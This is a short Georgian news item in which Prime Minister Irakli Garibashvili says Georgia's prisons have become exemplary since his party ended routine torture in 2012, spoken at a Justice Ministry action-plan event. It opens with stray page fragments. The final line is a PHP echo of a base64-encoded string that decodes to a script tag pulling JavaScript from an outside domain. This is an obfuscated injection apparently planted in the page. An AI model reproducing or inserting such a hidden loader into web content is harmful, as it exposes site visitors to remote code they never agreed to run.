celsiusi
ავერსი საქკაბელი
საქართველოს პრემიერ-მინისტრის, ირაკლი ღარიბაშვილის განცხადებით, დღეს ქვეყანაში არსებულ ციხეებში სანიმუშო, სამაგალითო ვითარებაა. 
 
მისი თქმით, ამ მიმართულებით საქართველო მსოფლიოს მასშტაბით და ევროპის მასშტაბით ერთ-ერთ მოწინავე რიგებშია. ამის შესახებ,  პრემიერ მინისტრმა ​იუსტიციის სამინისტროს 10 წლიანი სამოქმედო გეგის წარდგენის ღონისძიებაზე სიტყვით გამოსვლისას განაცხადა. 
 
როგორც ღარიბაშვილმა აღნიშნა, ციხეებში არსებული ვითარება იყო 2012 წელს  მმართველი გუნდის გამოწვევა. 
 
"ძალიან საინტერესო იდეები აქვს ბატონ რატის პენიტენციურ დაწესებულებებთან დაკავშირებით. ციხეებში არსებული ვითარება იყო ჩვენი ხელისუფლების გამოწვევა, როდესაც ჩვენ მოვედით ხელისუფლებაში 2012 წელს. წამება და არაადამიანური მოპყრობა იყო ყოველდღიური პრაქტიკა ციხეებში, რაც ჩვენ, 2012 წელს, მოსვლისთანავე დავასრულეთ და დღეს გვაქვს სანიმუშო, სამაგალითო ვითარება ციხეებში, მთელი მსოფლიოს მასშტაბით და ევროპის მასშტაბით ერთ-ერთ მოწინავე რიგებში ვართ“, - განაცხადა პრემიერ-მინისტრმა.
 
 
1243
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");